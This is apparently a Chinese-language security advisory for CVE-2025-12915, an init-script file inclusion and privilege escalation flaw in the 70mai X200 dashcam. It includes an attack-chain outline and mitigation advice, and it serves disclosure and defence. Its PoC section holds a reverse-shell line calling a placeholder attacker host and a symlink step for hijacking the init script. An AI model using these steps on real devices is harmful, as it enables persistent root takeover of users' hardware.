CVE-2025-12915: 70mai X200行车记录仪Init Script文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-12915

漏洞类型

文件包含/本地权限提升

CVSS评分

6.4 中危

攻击向量

本地 (AV:L)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

70mai X200 Omni Dashcam (70mai X200)

漏洞概述

CVE-2025-12915是存在于70mai X200智能行车记录仪设备中的一个中危安全漏洞。该漏洞位于设备的Init Script初始化脚本处理组件中，攻击者可以通过本地方式利用此漏洞进行文件包含操作，成功利用后可实现本地权限提升和持久化控制。由于该漏洞利用复杂度较高，需要攻击者具备本地访问权限和高权限认证，因此实际攻击场景相对受限。但值得注意的是，该漏洞的利用代码已被公开，厂商在接到早期通知后未做出任何回应，导致漏洞长期存在。攻击者通过劫持Init Script处理流程，可以在该设备上执行任意代码，这对于依赖该设备进行行车记录的用户构成了潜在安全风险。

技术细节

该漏洞属于本地文件包含（Local File Inclusion）类型，存在于70mai X200设备的初始化脚本处理程序中。攻击者需要具备设备的本地访问权限和高权限认证才能利用此漏洞。漏洞的核心在于Init Script Handler组件对脚本文件的处理机制存在缺陷，攻击者可以通过精心构造的文件路径或符号链接，实现对系统敏感文件的包含和执行。具体来说，攻击者可以利用Init Script的二进制文件劫持（Binary Hijacking）技术，通过替换或修改初始化脚本中引用的可执行文件路径，达到持久化控制设备的目的。由于该设备运行嵌入式Linux系统，初始化脚本通常在系统启动时以root权限执行，因此成功利用此漏洞可以直接获得设备的root权限，实现长期持久化控制。

攻击链分析

STEP 1

步骤1

获取70mai X200设备的本地访问权限，需要具备高权限用户认证

STEP 2

步骤2

识别并定位设备上的Init Script Handler组件及其配置文件

STEP 3

步骤3

利用文件包含漏洞，通过路径遍历或符号链接劫持初始化脚本

STEP 4

步骤4

将恶意的shell脚本或可执行文件注入到Init Script处理流程中

STEP 5

步骤5

等待系统重启或服务重新加载，触发恶意代码以root权限执行

STEP 6

步骤6

成功实现本地权限提升，获得设备的持久化root shell访问

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-12915 PoC: 70mai X200 Init Script Binary Hijack
# Reference: https://github.com/geo-chen/70mai

# Step 1: Identify the vulnerable Init Script Handler
# The Init Script Handler processes startup scripts at /etc/init.d/ or similar locations

# Step 2: Find the target init script
TARGET_INIT_SCRIPT="/etc/init.d/70mai_service"

# Step 3: Create malicious payload to replace the legitimate binary
MALICIOUS_PAYLOAD='#!/bin/sh
# Reverse shell payload
/bin/sh -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1'

# Step 4: Exploit the file inclusion vulnerability
# Since PR:H is required, attacker needs elevated privileges
# The vulnerability allows including arbitrary files via path traversal

# Example attack vector (requires local access):
# ln -sf /path/to/malicious/script /etc/init.d/70mai_service
# or
# Modify the init script configuration to point to attacker-controlled file

# Step 5: Wait for system reboot or service restart
# The malicious code will execute with root privileges

echo "[!] This PoC demonstrates the file inclusion vulnerability in 70mai X200"
echo "[!] Exploitation requires: local access + high privileges"
echo "[!] Result: root shell via init script hijacking"

影响范围

70mai X200 Omni Dashcam < 20251019

防御指南

临时缓解措施

由于厂商未回应漏洞披露报告，建议用户暂时限制设备的网络暴露，避免将设备直接连接到不可信的公共网络。同时应监控设备的异常行为，如发现未授权的配置变更或未知进程运行，应立即断电并联系厂商。对于安全性要求较高的场景，建议暂时停止使用该设备，等待官方安全更新发布。